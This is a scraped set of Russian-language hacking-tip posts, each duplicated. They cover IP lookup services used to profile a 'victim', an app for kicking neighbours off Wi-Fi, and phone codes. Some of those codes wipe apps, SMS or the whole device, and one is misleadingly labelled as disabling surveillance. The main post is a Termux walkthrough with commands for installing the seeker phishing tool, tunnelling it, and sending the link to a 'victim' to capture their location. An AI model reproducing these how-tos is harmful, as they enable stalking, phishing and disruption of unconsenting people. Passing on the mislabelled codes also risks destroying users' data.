Что можно получить, имея только IP-адрес?
Приветствую друзья! Хочу привести пример того, что сможет узнать о Вас злоумышленник имея на руках Ваш айпи-адрес (или наоборот). Сервисы, о которых пойдёт речь абсолютно бесплатны и находятся в открытом доступе.
1. IP-score — сайт проверяет на наличие в blacklists определённого айпи.
2. HTMLweb — поможет определить страну, город и район. Дополнительно есть информация о whois-server.
3. ipqualityscore — c помощью этого сервиса можно получить информации об использовании прокси, VPN или TOR.
4. iknowwhatyoudownload — ресурс для получения информации о использовании торрент трэкеров. Есть возможность создать зараженную ссылку и отправить ее «жертве»..
5. xspider-77 (ссылка на скачивание программы) —можно получить информацию о занятых портах и уязвимостях.
6. Shadow Security Scanner (ссылка на скачивание программы) — определяет операционную систему, название машины, а также дату и время на компьютере.
Всем сочных пробивов ✌️
Приветствую друзья! Хочу привести пример того, что сможет узнать о Вас злоумышленник имея на руках Ваш айпи-адрес (или наоборот). Сервисы, о которых пойдёт речь абсолютно бесплатны и находятся в открытом доступе.
1. IP-score — сайт проверяет на наличие в blacklists определённого айпи.
2. HTMLweb — поможет определить страну, город и район. Дополнительно есть информация о whois-server.
3. ipqualityscore — c помощью этого сервиса можно получить информации об использовании прокси, VPN или TOR.
4. iknowwhatyoudownload — ресурс для получения информации о использовании торрент трэкеров. Есть возможность создать зараженную ссылку и отправить ее «жертве»..
5. xspider-77 (ссылка на скачивание программы) —можно получить информацию о занятых портах и уязвимостях.
6. Shadow Security Scanner (ссылка на скачивание программы) — определяет операционную систему, название машины, а также дату и время на компьютере.
Всем сочных пробивов ✌️
Отрубаем всех пользователей Wi-Fi
Нашел для Вас приложение, которое без каких-либо особых прав может отключить любого человека от Wi-Fi в 1 клик.
1. Переходим по ссылке и скачиваем Wi-Fi Kill;
2. Смотрим подключенные устройства, и, по желанию, отрубаем их от вайфая;
Держитесь, соседи ✌️
Нашел для Вас приложение, которое без каких-либо особых прав может отключить любого человека от Wi-Fi в 1 клик.
1. Переходим по ссылке и скачиваем Wi-Fi Kill;
2. Смотрим подключенные устройства, и, по желанию, отрубаем их от вайфая;
Держитесь, соседи ✌️
Трешбокс.ру
WiFiKill 2.3.2
Отключение «лишних» пользователей сети WiFi.
Отключаем реальную слежку на смартфоне
Недавно наткнулся на интересные коды для смартфонов, которые показывают довольно полезные вещи.
Например, с помощью простого кода можно узнать,прослушивают ваш телефон или нет, узнать IMEI смартфона, произвести полное удаление всех файлов и тд.
И все это можно провернуть за 10 секунд. Поехали!
Для всех смартфонов:
1.
Проверьте, происходит ли переадресация ваших звонков и сообщения на другие номера(проверка на слежку).
2. *#06#
Показывает IMEI телефона(зная можно отследить телефон).
3.
Узнаем куда идет переадресация.
Если в первом пункте с голосовой почтой будет номер, не пугайтесь-это ваш оператор.
НО. Если вы поняли, что все ваши данные переадресовываются на чужие номера и вы не можете отключить, тогда звоните оператору ибо ваш смартфон скорее всего заражен. Оператор должен будет вам помочь
4.
Отключаем слежку полностью.
Для Android:
1.
Удаляет все приложения.
2.
Сброс настроек до заводских.
3.
Полная информация о камере и телефоне.
4.
Удаление всех SMS.
Есть еще много интересных кодов, но эти самые полезные из них.
Недавно наткнулся на интересные коды для смартфонов, которые показывают довольно полезные вещи.
Например, с помощью простого кода можно узнать,прослушивают ваш телефон или нет, узнать IMEI смартфона, произвести полное удаление всех файлов и тд.
И все это можно провернуть за 10 секунд. Поехали!
Для всех смартфонов:
1.
*#21#Проверьте, происходит ли переадресация ваших звонков и сообщения на другие номера(проверка на слежку).
2. *#06#
Показывает IMEI телефона(зная можно отследить телефон).
3.
*#62#Узнаем куда идет переадресация.
Если в первом пункте с голосовой почтой будет номер, не пугайтесь-это ваш оператор.
НО. Если вы поняли, что все ваши данные переадресовываются на чужие номера и вы не можете отключить, тогда звоните оператору ибо ваш смартфон скорее всего заражен. Оператор должен будет вам помочь
4.
##002#Отключаем слежку полностью.
Для Android:
1.
*#*#7780#*#*Удаляет все приложения.
2.
*2767*3855#Сброс настроек до заводских.
3.
*#*#34971539#*#*Полная информация о камере и телефоне.
4.
#*5376#Удаление всех SMS.
Есть еще много интересных кодов, но эти самые полезные из них.
Вычисляем точное местоположение с помощью termux
В этом нам поможет такая утилита как seeker. Его концепция очень проста, он создает "фишинговую" ссылку, которая запрашивает местоположение, и вауля. Местоположение жертвы у нас. Но не всё так просто, как звучит, по крайней мере есть одна проблема - как заставить человека перейти по ссылке ? Это уже всё зависит от вашего мышления, и знания СИ. Итак, давайте по порядку разберемся.
Установка
Первым делом мы обновляем пакеты:
pkg update
pkg upgrade
Теперь скачиваем необходимые нам инструменты:
pkg install git
pkg install openssh
Ну а дальше остается самое простое, это скачать инструмент и запустить автоматическую установку:
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termuxinstall.sh
./termuxinstall.sh
После успешной установки мы запускаем сам инструмент:
python3 seeker.py
И тут мы опять сталкиваемся с проблемой. Сейчас объясню. Мы запустили сикер, но для его использование нужно весь трафик переводить в интернет (нубскими словами). Для этого есть два инструмента - это Ngrok, и Serveo.
Я покажу как сделать всё на serveo, потому что активно пользуюсь им. Для этого мы открываем вторую сессию в термукс и вводим одну команду:
ssh -R 80:localhost:8080 ssh.localhost.run
Готово теперь копируем ссылку из второй сессии, где мы собственно сделали некий тунель, и кидаем жертве. (p.s если не будет работать, включите VPN)
Программа выдаст нам, операционную систему, айпи, координаты, и ссылка на гугл карты 😊
В этом нам поможет такая утилита как seeker. Его концепция очень проста, он создает "фишинговую" ссылку, которая запрашивает местоположение, и вауля. Местоположение жертвы у нас. Но не всё так просто, как звучит, по крайней мере есть одна проблема - как заставить человека перейти по ссылке ? Это уже всё зависит от вашего мышления, и знания СИ. Итак, давайте по порядку разберемся.
Установка
Первым делом мы обновляем пакеты:
pkg update
pkg upgrade
Теперь скачиваем необходимые нам инструменты:
pkg install git
pkg install openssh
Ну а дальше остается самое простое, это скачать инструмент и запустить автоматическую установку:
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termuxinstall.sh
./termuxinstall.sh
После успешной установки мы запускаем сам инструмент:
python3 seeker.py
И тут мы опять сталкиваемся с проблемой. Сейчас объясню. Мы запустили сикер, но для его использование нужно весь трафик переводить в интернет (нубскими словами). Для этого есть два инструмента - это Ngrok, и Serveo.
Я покажу как сделать всё на serveo, потому что активно пользуюсь им. Для этого мы открываем вторую сессию в термукс и вводим одну команду:
ssh -R 80:localhost:8080 ssh.localhost.run
Готово теперь копируем ссылку из второй сессии, где мы собственно сделали некий тунель, и кидаем жертве. (p.s если не будет работать, включите VPN)
Программа выдаст нам, операционную систему, айпи, координаты, и ссылка на гугл карты 😊
GitHub
GitHub - thewhiteh4t/seeker: Accurately Locate Smartphones using Social Engineering
Accurately Locate Smartphones using Social Engineering - GitHub - thewhiteh4t/seeker: Accurately Locate Smartphones using Social Engineering
#новости
Талантливый реверс-инженер с Github под ником "August" сумел произвести обратную разработку, получить исходный код приложения TikTok и опубликовал полученный исходный код на платформе разработчика.
Как выяснилось исходники содержат функции отслеживания местоположения, отслеживание телефонных звонков, создание скриншетов вашего экрана при открытии определенных приложений, мониторинг сетей Wi-Fi, сбор MAC-адресов и вычисление местоположения при помощи них, распознавание лиц, анализ нажатия ваших клавиш даже когда вы не пользуетесь приложением и еще множество отслеживающих функций.
«TikTok - это механизм сбора данных, замаскированный под платформу социальных сетей. Это законное шпионское ПО» — отметил инженер
Корпорация-зла TikTok в свою очередь воспользовалась вредоносными законами об авторском праве (DMCA) и отправила запрос к корпорации-зла Github с требованием немедленно удалить репозиторий инженера, а заодно еще 19 репозиториев со схожими наработками по обратной разработке TikTok.
К сожалению, теперь исходники изобличающее это следящее ПО удалены с Github.
Талантливый реверс-инженер с Github под ником "August" сумел произвести обратную разработку, получить исходный код приложения TikTok и опубликовал полученный исходный код на платформе разработчика.
Как выяснилось исходники содержат функции отслеживания местоположения, отслеживание телефонных звонков, создание скриншетов вашего экрана при открытии определенных приложений, мониторинг сетей Wi-Fi, сбор MAC-адресов и вычисление местоположения при помощи них, распознавание лиц, анализ нажатия ваших клавиш даже когда вы не пользуетесь приложением и еще множество отслеживающих функций.
«TikTok - это механизм сбора данных, замаскированный под платформу социальных сетей. Это законное шпионское ПО» — отметил инженер
Корпорация-зла TikTok в свою очередь воспользовалась вредоносными законами об авторском праве (DMCA) и отправила запрос к корпорации-зла Github с требованием немедленно удалить репозиторий инженера, а заодно еще 19 репозиториев со схожими наработками по обратной разработке TikTok.
К сожалению, теперь исходники изобличающее это следящее ПО удалены с Github.
Скачиваем программу, не подхватив ни единого вируса
Бывало ли у вас такое, что при установке какого-нибудь приложения вместе с ним устанавливалось ненужное приложение? Аваст, Яндекс и тому подобный мусор.
VirusTotal даже не пикнет, т.к условно файл не содержит вирусов.
С выявлением такого ПО вам поможет утилита Unchecky.
Эта утилита на автомате отклоняет подобные программы, которые не касаются той, которой вы хотите пользоваться. Кроме этого, вы сокращаете свое нажатие кнопок в установке.
Приступим:
1. Скачиваем Unchecky
2. Выдаём нужные разрешения программе и нажимаем "Готово".
3. Теперь при каждой установке какой-либо программы Unchecky будет защищать вас.
Пользуемся и не засоряем свой ПК!
Бывало ли у вас такое, что при установке какого-нибудь приложения вместе с ним устанавливалось ненужное приложение? Аваст, Яндекс и тому подобный мусор.
VirusTotal даже не пикнет, т.к условно файл не содержит вирусов.
С выявлением такого ПО вам поможет утилита Unchecky.
Эта утилита на автомате отклоняет подобные программы, которые не касаются той, которой вы хотите пользоваться. Кроме этого, вы сокращаете свое нажатие кнопок в установке.
Приступим:
1. Скачиваем Unchecky
2. Выдаём нужные разрешения программе и нажимаем "Готово".
3. Теперь при каждой установке какой-либо программы Unchecky будет защищать вас.
Пользуемся и не засоряем свой ПК!
